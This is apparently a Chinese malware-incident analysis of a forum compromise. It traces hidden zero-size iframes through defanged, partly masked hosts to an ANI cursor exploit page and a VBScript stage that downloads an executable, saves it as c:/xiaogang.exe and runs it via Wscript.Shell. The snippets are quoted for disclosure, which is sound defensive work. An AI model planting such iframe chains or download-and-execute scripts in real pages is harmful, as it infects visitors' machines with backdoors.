某易论坛被植入利用ANI漏洞传播 Backdoor.Win32.Agent.ahj 的代码

简介: 某易论坛被植入利用ANI漏洞传播 Backdoor.Win32.Agent.ahj 的代码

植入的代码为:

/---
<iframe src=hxxp://www.y*xg**m7****8.com/y*x.htm width=0 height=0></iframe>
---/

hxxp://www.y*xg**m7****8.com/y*x.htm 包含代码:

/---
<iframe src="hxxp://l****l*8**0.com/x**x/x**x.htm" width=1 height=1></iframe>
---/

hxxp://l****l*8**0.com/x**x/x**x.htm 包含代码:

/---
<iframe src="hxxp://l****l*8**0.com/x**x/x**x**1.htm" width=100 height=1></iframe>
<iframe src="hxxp://l****l*8**0.com/x**x/x**x**2.htm" width=100 height=1></iframe>
---/

hxxp://l****l*8**0.com/x**x/x**x**1.htm 包含代码:

/---
<DIV style="CURSOR: url('hxxp://l****l*8**0.com/x**x/xx2.jpg')">
利用ANI漏洞 通过 xx2.jpg  下载文件 xx.exe。
hxxp://l****l*8**0.com/x**x/x**x**2.htm 的内容为分为两部分。
第一部分为VBScript代码,功能是 利用  Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 下载文件 xx.exe,保存为c:/xiaogang.exe。然后创建内容为
/---

Set Shell = CreateObject("Wscript.Shell")

Shell.Run ("c:/xiaogang.exe")

Set Shell = Nothing

---/

的文件xiaogang.vbs。

通过Shell.Application 对象 Zhong 的 ShellExecute 方法 执行xiaogang.vbs,从而运行xiaogang.exe。

第二部分是jscript代码:是输出迷惑信息:

/---

你好,您所访问的页面正在加载中...请稍候片刻....

---/


相关文章
|
5月前
|
存储 API
LangChain与智能Agent构建问题之MetaGPT中工程师智能体代码错误如何解决
LangChain与智能Agent构建问题之MetaGPT中工程师智能体代码错误如何解决
65 1
|
5月前
|
人工智能 自然语言处理 搜索推荐
微软开源基于ChatGPT的,超级文本代码智能体
【7月更文挑战第17天】微软的TaskWeaver是开源的LLM框架,聚焦领域特定数据分析与个性化需求。它以代码优先,将用户请求转为可执行代码,增强处理复杂任务的效率和准确性。通过用户定义插件实现定制,适应多种场景。然而,转化请求可能引入复杂性和错误,非技术用户使用插件有难度,且开源带来的安全与隐私问题需关注。[论文链接](https://arxiv.org/abs/2311.17541)**
73 4
|
3月前
|
安全
利用迅雷和MS06014漏洞传播Worm.Win32.Agent.a的电子书网站
利用迅雷和MS06014漏洞传播Worm.Win32.Agent.a的电子书网站
一个传播Trojan.Win32.Agent.aac的网站
一个传播Trojan.Win32.Agent.aac的网站
|
3月前
|
JavaScript 前端开发 安全
某文学论坛被挂马 Worm.Win32.Agent.ipi/Trojan.Win32.Agent.avt
某文学论坛被挂马 Worm.Win32.Agent.ipi/Trojan.Win32.Agent.avt
|
3月前
|
缓存 算法 网络协议
文学论坛挂的马换 成 Worm.Win32.Agent.imh 了
文学论坛挂的马换 成 Worm.Win32.Agent.imh 了
|
3月前
|
监控 安全 Windows
遭遇通过U盘传播的蠕虫Worm.Win32.Agent.aj/setup.exe等
遭遇通过U盘传播的蠕虫Worm.Win32.Agent.aj/setup.exe等
|
6月前
|
人工智能 搜索推荐 机器人
AppFlow无代码轻松搭建模型Agent
使用钉钉,现在每个人都能轻松创建自己的AI助手。通过结合各种插件,如天气、机票查询和地图,你可以定制个性化的工作助手。利用AppFlow,即使没有编程经验也能搭建AI Agent。步骤包括:1) 在钉钉开放平台创建应用,获取凭证;2) 在钉钉卡片平台创建AI卡片实例;3) 在AppFlow配置连接流,添加所需插件;4) 创建钉钉机器人,设置HTTP消息接收并关联AppFlow的Webhook。完成这些步骤后,你就可以在钉钉群中与你的AI助手互动了。
|
5月前
|
机器学习/深度学习 人工智能 自然语言处理
能自动查找各种漏洞,专用于网络安全的AI Agent
【7月更文挑战第3天】研究表明,大型语言模型(LLM)可应用于网络安全,自动发现和利用漏洞,包括零日漏洞。多Agent系统中,HPTSA规划任务,其他Agent执行具体工作,提升发现和应对漏洞的效率。然而,LLM的复杂性可能导致可解释性、可控性问题,且系统鲁棒性、泛化能力和安全性仍需加强。[链接: arxiv.org/abs/2406.01637]
175 1
|
7月前
|
存储 搜索推荐 前端开发
变革来袭!多Agent框架MuAgent带你解锁代码开发新姿势
在这个信息技术爆炸的时代,我们都知道大型语言模型(LLM)拥有处理复杂问题的能力,但当遇到编程难题这种更高级的挑战时,单独的LLM Agent可能就不够看了。社区里动起了脑筋,玩出了新花样——组合多个Agent来应对高难度挑战!正如Multi Agent的构建过程所示,与其说我们是在设计Agents,不如说是对当前需求的深入理解后去构建出一条专属于某个场景的SOP。
889 2
下一篇
DataWorks